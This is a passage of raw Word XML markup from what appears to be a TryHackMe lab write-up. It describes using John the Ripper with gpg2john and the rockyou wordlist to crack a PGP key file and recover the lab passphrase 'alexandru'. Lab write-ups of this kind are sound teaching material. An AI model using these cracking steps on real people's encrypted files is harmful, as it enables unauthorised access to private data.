          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>The ‘cat’</w:t>
      </w:r>
      <w:r w:rsidR="000930A0">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> command</w:t>
      </w:r>
      <w:r w:rsidR="005563EE" w:rsidRPr="000930A0">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005563EE" w:rsidRPr="000930A0">
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">is used to read file from the data and display as output as illustrated in figure </w:t>
      </w:r>
      <w:r w:rsidR="00F51B8C">
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidR="00716147">
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="005563EE" w:rsidRPr="000930A0">
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEB1429" w14:textId="248F02AC" w:rsidR="009D0FD1" w:rsidRDefault="009D0FD1" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D0FD1">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78B4D9D2" wp14:editId="28024AF9">
            <wp:extent cx="5731510" cy="1455420"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="294847924" name="Picture 2948479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847924" name="Picture 294847924" descr="Text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId123"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1455420"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D663C94" w14:textId="0D80D544" w:rsidR="005563EE" w:rsidRDefault="005563EE" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="424" w:name="_Toc111363671"/>
      <w:bookmarkStart w:id="425" w:name="_Toc111363808"/>
      <w:bookmarkStart w:id="426" w:name="_Toc111981831"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>106</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: The 'cat' command used on credential.pgp</w:t>
      </w:r>
      <w:r w:rsidR="006A3479">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i w:val="0"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fNGQ2YWM0MzMtOGM3Mi00ZWFlLTkwMjctYmMyMzgzMDM1MDAz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1138333821"/>
          <w:placeholder>
            <w:docPart w:val="01109C8489BC41E4A1675961AAF9358E"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:i w:val="0"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[55]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="424"/>
      <w:bookmarkEnd w:id="425"/>
      <w:bookmarkEnd w:id="426"/>
    </w:p>
    <w:p w14:paraId="573F4A0A" w14:textId="77777777" w:rsidR="005563EE" w:rsidRPr="005563EE" w:rsidRDefault="005563EE" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B4A4EEE" w14:textId="2175B546" w:rsidR="0021694A" w:rsidRDefault="0021694A" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>The encrypted pgp file can potentially be unlocked using the key from the asc file</w:t>
      </w:r>
      <w:r w:rsidR="009E7798">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> so </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F5384D" w14:textId="43846FCF" w:rsidR="009D0FD1" w:rsidRDefault="0021694A" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>johntheripper on gpg2john with the file tryhackme.asc</w:t>
      </w:r>
      <w:r w:rsidR="009E7798">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> will be run and the output placed in a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>file</w:t>
      </w:r>
      <w:r w:rsidR="009E7798">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> named</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> hashes_for_john </w:t>
      </w:r>
      <w:r w:rsidR="009E7798">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">on the ‘opt’ directory as demonstrated in figure </w:t>
      </w:r>
      <w:r w:rsidR="00F51B8C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidR="00716147">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="009E7798">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B293F33" w14:textId="3153429F" w:rsidR="0021694A" w:rsidRDefault="0021694A" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0021694A">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E79155A" wp14:editId="33A73970">
            <wp:extent cx="5730893" cy="1818709"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="294847927" name="Picture 29484792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847927" name="Picture 294847927" descr="Text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId124"/>
                    <a:srcRect t="4301" b="12407"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1818905"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="622FABCC" w14:textId="318B466D" w:rsidR="009E7798" w:rsidRDefault="009E7798" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="427" w:name="_Toc111363672"/>
      <w:bookmarkStart w:id="428" w:name="_Toc111363809"/>
      <w:bookmarkStart w:id="429" w:name="_Toc111981832"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>107</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Run JTR against tryhackme.asc</w:t>
      </w:r>
      <w:r w:rsidR="006A3479">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i w:val="0"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fNjhlMGI1YjctNmU4My00ZmY4LWJmYWEtOTUzMzUyMTYzZWEx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332521333"/>
          <w:placeholder>
            <w:docPart w:val="D52EBDF8CE594C3B94ACD118B53923E2"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:i w:val="0"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[55]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="427"/>
      <w:bookmarkEnd w:id="428"/>
      <w:bookmarkEnd w:id="429"/>
    </w:p>
    <w:p w14:paraId="5DFBD9C0" w14:textId="77777777" w:rsidR="009E7798" w:rsidRPr="009E7798" w:rsidRDefault="009E7798" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62D572BD" w14:textId="1787D57D" w:rsidR="0021694A" w:rsidRDefault="009E7798" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>The text inside the hashes file will be run against the</w:t>
      </w:r>
      <w:r w:rsidR="0021694A">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> wordlist </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="0021694A">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>rockyou</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">’ which is also </w:t>
      </w:r>
      <w:r w:rsidR="0021694A">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">in the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="0021694A">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>opt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="0021694A">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory.</w:t>
      </w:r>
      <w:r w:rsidR="00752D12">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00752D12">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">he key ‘alexandru’ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">has been found as illustrated in figure </w:t>
      </w:r>
      <w:r w:rsidR="00F51B8C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidR="00716147">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00752D12">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3230198E" w14:textId="4BCCA18E" w:rsidR="0021694A" w:rsidRDefault="009E7798" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251595776" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2C9B5406" wp14:editId="01444B25">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>48706</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>897289</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="529590" cy="149002"/>
                <wp:effectExtent l="19050" t="19050" r="22860" b="22860"/>
                <wp:wrapNone/>
                <wp:docPr id="760259231" name="Rectangle 760259231"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="529590" cy="149002"/>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9F3223" id="Rectangle 760259231" o:spid="_x0000_s1026" style="position:absolute;margin-left:3.85pt;margin-top:70.65pt;width:41.7pt;height:11.75pt;z-index:251595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" filled="f" strokecolor="#c00000" strokeweight="2.25pt">
                <w10:wrap anchorx="margin"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251586560" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6F64C482" wp14:editId="0D717803">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1759602</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>8324</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3608173" cy="187822"/>
                <wp:effectExtent l="19050" t="19050" r="11430" b="22225"/>
                <wp:wrapNone/>
                <wp:docPr id="760259230" name="Rectangle 760259230"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3608173" cy="187822"/>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326B5F" id="Rectangle 760259230" o:spid="_x0000_s1026" style="position:absolute;margin-left:138.55pt;margin-top:.65pt;width:284.1pt;height:14.8pt;z-index:251586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" filled="f" strokecolor="#c00000" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00752D12" w:rsidRPr="00752D12">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3893D9F5" wp14:editId="61936658">
            <wp:extent cx="5614910" cy="1511935"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:docPr id="294847929" name="Picture 29484792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847929" name="Picture 294847929" descr="Text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId125"/>
                    <a:srcRect l="863" t="6870" r="1110" b="9062"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5618431" cy="1512883"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="045E9EE1" w14:textId="49BF6DFF" w:rsidR="009E7798" w:rsidRPr="006A3479" w:rsidRDefault="009E7798" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="430" w:name="_Toc111363673"/>
      <w:bookmarkStart w:id="431" w:name="_Toc111363810"/>
      <w:bookmarkStart w:id="432" w:name="_Toc111981833"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>108</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: The key has been found</w:t>
      </w:r>
      <w:r w:rsidR="006A3479">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i w:val="0"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fYmYxYjFlNDAtYTgyYi00MjY3LWI2YzItOGE2M2M2ZjAyZmI0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482360195"/>
          <w:placeholder>
            <w:docPart w:val="D10E686430A949C7959AF889B704E437"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:i w:val="0"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[55]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="430"/>
      <w:bookmarkEnd w:id="431"/>
      <w:bookmarkEnd w:id="432"/>
    </w:p>
    <w:p w14:paraId="7E18F3B7" w14:textId="77777777" w:rsidR="009E7798" w:rsidRPr="009E7798" w:rsidRDefault="009E7798" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="495BB4E1" w14:textId="76A9630D" w:rsidR="00776E82" w:rsidRDefault="009E7798" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
